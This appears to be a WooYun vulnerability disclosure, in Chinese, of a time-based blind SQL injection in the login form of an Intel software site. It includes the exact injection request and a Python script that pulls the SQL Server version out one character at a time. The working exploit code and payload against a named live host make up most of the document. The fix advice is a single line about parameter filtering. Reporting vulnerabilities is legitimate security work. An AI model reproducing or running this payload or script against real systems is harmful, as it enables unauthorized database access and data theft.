乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-03: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-12-18: 厂商已经主动忽略漏洞,细节向公众公开
英特尔公司另一分站MSSQL盲注,写了一段验证脚本。
注入点:
POST https://software.intel.com/en-us/user/loginform_build_id=form-koPSRbAyaPXexmNEmu5Spug7HZzMimS28Q4IEcDY-6o&form_id=user_login&name=fasfa')); if (ascii(substring(@@version,1,1))!=1) waitfor delay '0:0:13' -- &op=Log in&pass=fasdfas
参数name可注入。
SQL Server版本:Mirosoft SQL Server 2005 - 9
脚本附上:
import httplibimport timeimport stringimport sysimport randomimport urllibheaders = { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': '', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',}payloads = list(string.ascii_lowercase)payloads += list(string.ascii_uppercase)for i in range(0,10): payloads.append(str(i))payloads += ['@','_', '.', '-', '\\', ' ']print 'Try to retrive SQL Server Version:'user = ''for i in range(1,30,1): for payload in payloads: timeout_count = 0 for j in range(1,3): try: conn = httplib.HTTPSConnection('software.intel.com', timeout=5) params = { 'form_build_id': 'form-koPSRbAyaPXexmNEmu5Spug7HZzMimS28Q4IEcDY-6o', 'form_id': 'user_login', 'name': "fasfa')); if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- " % (i, ord(payload)), 'op': 'Log in', 'pass': 'fasfasd', } start_time = time.time() conn.request(method='POST', url= '/en-us/user/login', body = urllib.urlencode(params), headers = headers) conn.getresponse() conn.close() break except: timeout_count += 1 if timeout_count == 2: # 2 times to confirm user += payload sys.stdout.write( '\r[In Progress] ' + user ) sys.stdout.flush() breakprint '\n[Done], SQL Server version is', user
参数过滤
未能联系到厂商或者厂商积极拒绝